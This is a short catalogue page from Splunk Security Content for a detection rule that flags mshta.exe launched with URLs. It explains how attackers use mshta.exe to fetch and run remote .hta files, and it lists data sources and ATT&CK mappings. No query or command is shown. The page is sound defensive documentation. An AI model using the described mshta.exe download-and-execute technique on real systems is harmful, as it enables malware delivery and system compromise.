heroui logo

Detect MSHTA Url in Command Line

Splunk Security Content

View Source
Summary
This detection rule identifies instances where the Microsoft HTML Application Host (mshta.exe) is invoked with command-line parameters that include URLs. Leveraging data from Endpoint Detection and Response (EDR) agents such as Sysmon and Windows Event Logs, this rule targets potential malicious activities. Adversaries frequently misuse mshta.exe to download and execute remote .hta files, thus circumventing standard security measures. The ability to download these payloads can lead to significant threats including arbitrary code execution, compromise of the system, data theft, or further infiltration into the network. This detection rule allows security teams to monitor for and respond to such suspicious command-line executions effectively, mitigating risks associated with mshta.exe being used as a vector for malware delivery.
Categories
  • Endpoint
Data Sources
  • Windows Registry
  • Process
ATT&CK Techniques
  • T1218
  • T1218.005
Created: 2024-12-10